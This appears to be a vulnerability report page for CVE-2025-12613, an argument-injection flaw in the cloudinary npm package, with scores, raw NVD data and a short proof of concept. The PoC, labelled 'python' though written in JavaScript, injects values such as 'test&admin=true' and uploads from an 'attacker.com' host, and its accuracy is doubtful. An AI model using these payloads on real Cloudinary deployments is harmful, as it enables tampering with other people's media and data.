Security Vulnerability Report
中文
CVE-2025-12613 CVSS 8.6 HIGH

CVE-2025-12613

Published: 2025-11-10 05:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Versions of the package cloudinary before 2.7.0 are vulnerable to Arbitrary Argument Injection due to improper parsing of parameter values containing an ampersand. An attacker can inject additional, unintended parameters. This could lead to a variety of malicious outcomes, such as bypassing security checks, altering data, or manipulating the application's behavior. **Note:** Following our established security policy, we attempted to contact the maintainer regarding this vulnerability, but haven't received a response.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

cloudinary npm package < 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-12613 PoC - Arbitrary Argument Injection in Cloudinary // This PoC demonstrates how an attacker can inject additional parameters // by including an ampersand (&) in parameter values const cloudinary = require('cloudinary').v2; // Malicious configuration with injected parameter // The '&width=999' will be parsed as a separate parameter const maliciousConfig = { transformation: 'w_100&width=999&c_override', // Alternatively, the vulnerability can be triggered via upload parameters public_id: 'test&admin=true' }; // Attack scenario 1: Image transformation parameter injection cloudinary.url('test.jpg', { transformation: [ { width: 100, crop: 'scale' }, { overlay: 'logo&gravity=center' } // Injected parameter ] }); // Attack scenario 2: Upload parameter injection cloudinary.uploader.upload('https://attacker.com/malicious.jpg', { public_id: 'user_upload&mode=overwrite', folder: 'public&transformation=fl_ignore_aspect_ratio' }, function(error, result) { if (error) console.error('Upload error:', error); console.log('Upload result:', result); }); // Attack scenario 3: Signed URL manipulation // If an attacker knows a signed URL, they can inject parameters // Original: https://res.cloudinary.com/demo/image/upload/w_300/samples/bird.jpg // Malicious: https://res.cloudinary.com/demo/image/upload/w_300&h_999/samples/bird.jpg // The &h_999 will be interpreted as an additional height parameter // Defense: Always sanitize and validate parameter values before use // Implement proper URL encoding and parameter validation console.log('PoC demonstrates parameter injection vulnerability');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12613", "sourceIdentifier": "[email protected]", "published": "2025-11-10T05:15:42.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Versions of the package cloudinary before 2.7.0 are vulnerable to Arbitrary Argument Injection due to improper parsing of parameter values containing an ampersand. An attacker can inject additional, unintended parameters. This could lead to a variety of malicious outcomes, such as bypassing security checks, altering data, or manipulating the application's behavior.\r\r**Note:**\rFollowing our established security policy, we attempted to contact the maintainer regarding this vulnerability, but haven't received a response."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://github.com/cloudinary/cloudinary_npm/commit/ec4b65f2b3461365c569198ed6d2cfa61cca4050", "source": "[email protected]"}, {"url": "https://github.com/cloudinary/cloudinary_npm/pull/709", "source": "[email protected]"}, {"url": "https://security.snyk.io/vuln/SNYK-JS-CLOUDINARY-10495740", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.